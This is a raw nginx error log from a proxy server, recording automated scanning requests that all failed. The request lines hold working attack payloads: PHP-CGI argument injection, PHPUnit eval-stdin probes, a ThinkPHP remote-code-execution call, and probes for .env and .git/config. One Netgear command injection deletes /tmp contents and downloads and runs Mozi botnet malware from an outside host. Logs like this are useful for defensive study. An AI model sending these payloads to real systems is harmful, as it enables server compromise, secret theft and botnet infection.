[error] 940#940: *93747 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:53:44 [error] 940#940: *93747 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:53:46 [error] 940#940: *93747 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:53:48 [error] 940#940: *93747 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:53:49 [error] 940#940: *93747 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:53:50 [error] 940#940: *93747 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:53:52 [error] 940#940: *93747 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:53:53 [error] 940#940: *93747 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:53:55 [error] 940#940: *93747 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:53:56 [error] 940#940: *93747 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:53:58 [error] 940#940: *93747 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:53:59 [error] 940#940: *93747 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:54:01 [error] 940#940: *93747 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:54:02 [error] 940#940: *93747 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:54:04 [error] 940#940: *93747 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:54:05 [error] 940#940: *93747 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:54:07 [error] 940#940: *93747 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:54:08 [error] 940#940: *93747 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:54:10 [error] 940#940: *93747 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:54:11 [error] 940#940: *93747 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:54:13 [error] 940#940: *93747 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:54:14 [error] 940#940: *93747 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:54:15 [error] 940#940: *93747 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:54:16 [error] 940#940: *93747 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:54:17 [error] 940#940: *93747 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:54:18 [error] 940#940: *93747 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:54:19 [error] 940#940: *93747 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:54:20 [error] 940#940: *93747 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:54:21 [error] 940#940: *93747 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:54:22 [error] 940#940: *93747 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:54:23 [error] 940#940: *93747 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:54:24 [error] 940#940: *93747 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:54:25 [error] 940#940: *93747 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:54:26 [error] 940#940: *93747 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:54:26 [error] 940#940: *93747 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:54:27 [error] 940#940: *93747 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:54:29 [error] 940#940: *93747 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:54:29 [error] 940#940: *93747 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:54:30 [error] 940#940: *93747 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:54:31 [error] 940#940: *93747 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 04:54:34 [error] 940#940: *93747 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:36:24 [error] 941#941: *93757 open() "/var/www/html/login" failed (2: No such file or directory), client: 193.142.146.230, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:49:02 [error] 943#943: *95249 open() "/var/www/html/login" failed (2: No such file or directory), client: 206.168.34.44, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "222.117.41.51" +2026/02/18 05:54:43 [error] 943#943: *95252 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:43 [error] 943#943: *95252 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:43 [error] 943#943: *95252 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:44 [error] 943#943: *95252 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:44 [error] 943#943: *95252 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:44 [error] 943#943: *95252 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:45 [error] 943#943: *95252 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:45 [error] 943#943: *95252 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:45 [error] 943#943: *95252 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:46 [error] 943#943: *95252 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:46 [error] 943#943: *95252 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:46 [error] 943#943: *95252 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:47 [error] 943#943: *95252 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:47 [error] 943#943: *95252 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:47 [error] 943#943: *95252 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:48 [error] 943#943: *95252 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:48 [error] 943#943: *95252 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:48 [error] 943#943: *95252 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:48 [error] 943#943: *95252 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:49 [error] 943#943: *95252 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:49 [error] 943#943: *95252 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:49 [error] 943#943: *95252 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:50 [error] 943#943: *95252 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:50 [error] 943#943: *95252 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:50 [error] 943#943: *95252 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:50 [error] 943#943: *95252 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:51 [error] 943#943: *95252 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:51 [error] 943#943: *95252 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:51 [error] 943#943: *95252 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:52 [error] 943#943: *95252 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:52 [error] 943#943: *95252 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:52 [error] 943#943: *95252 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:53 [error] 943#943: *95252 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:53 [error] 943#943: *95252 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:54 [error] 943#943: *95252 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:54 [error] 943#943: *95252 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:54 [error] 943#943: *95252 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:54 [error] 943#943: *95252 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:55 [error] 943#943: *95252 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:55 [error] 943#943: *95252 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:54:56 [error] 943#943: *95252 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 05:57:48 [error] 951#951: *95258 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 172.94.9.253, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "222.117.41.51" +2026/02/18 05:57:49 [error] 952#952: *95259 open() "/var/www/html/admin/.git/config" failed (2: No such file or directory), client: 172.94.9.253, server: localhost-nginx-proxy-manager, request: "GET /admin/.git/config HTTP/1.1", host: "222.117.41.51" +2026/02/18 05:57:49 [error] 950#950: *95260 open() "/var/www/html/private/.git/config" failed (2: No such file or directory), client: 172.94.9.253, server: localhost-nginx-proxy-manager, request: "GET /private/.git/config HTTP/1.1", host: "222.117.41.51" +2026/02/18 06:20:02 [error] 951#951: *95293 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 06:28:32 [error] 951#951: *95317 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 74.82.47.2, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "222.117.41.51" +2026/02/18 06:34:34 [error] 955#955: *96808 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 74.82.47.2, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "222.117.41.51" +2026/02/18 07:03:07 [error] 956#956: *96824 open() "/var/www/html/aaa9" failed (2: No such file or directory), client: 95.215.0.144, server: localhost-nginx-proxy-manager, request: "GET /aaa9 HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 07:03:08 [error] 956#956: *96826 open() "/var/www/html/aab9" failed (2: No such file or directory), client: 95.215.0.144, server: localhost-nginx-proxy-manager, request: "GET /aab9 HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:03:00 [error] 951#951: *96943 open() "/var/www/html/setup.cgi" failed (2: No such file or directory), client: 182.60.237.31, server: localhost-nginx-proxy-manager, request: "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://182.60.237.31:42440/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" +2026/02/18 08:44:28 [error] 952#952: *96961 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "POST 